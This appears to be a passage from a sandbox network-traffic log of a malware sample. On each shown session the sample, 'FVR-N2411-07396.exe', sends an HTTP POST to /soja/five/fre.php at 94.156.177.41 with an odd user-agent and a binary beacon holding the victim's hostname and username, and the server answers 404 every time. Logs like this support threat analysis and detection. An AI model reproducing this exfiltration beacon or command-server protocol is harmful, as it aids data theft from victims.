Nov 28, 2024 13:52:55.529062986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:57.817408085 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49818	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:58.090461969 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:58.217591047 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:59.638304949 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49824	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:00.214221001 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:00.334230900 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:01.635416031 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49829	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:01.899885893 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:02.019879103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:03.487888098 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49833	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:03.758269072 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:03.878355980 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:05.350589037 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49837	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:05.617727041 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:05.737922907 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:07.207684994 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49840	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:07.475994110 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:07.602576971 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:09.113989115 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49845	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:09.386234045 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:09.650403023 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:11.552810907 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49851	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:11.821815968 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:11.943752050 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:13.408107996 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49857	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:13.666663885 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:13.787378073 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:15.302839041 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49862	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:15.575089931 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:15.696851015 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:16.968163013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49867	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:17.259123087 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:17.383644104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:18.852303982 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49871	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:19.118278027 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:19.396127939 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:20.909887075 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49877	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:21.180269957 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:21.301001072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:22.780473948 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49882	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:23.039669991 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:23.160248041 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:24.492685080 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49888	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:24.817872047 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:24.944914103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:26.320647955 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49893	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:26.586136103 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:26.713138103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:28.140003920 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49897	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:28.407987118 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:28.528183937 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:30.067215919 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49902	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:30.555847883 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:30.675909996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:32.107141972 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49908	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:32.370172977 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:32.490597963 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:33.909647942 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49913	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:34.192893982 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:34.319262028 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:35.791979074 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49917	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:36.054059029 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:36.174268961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
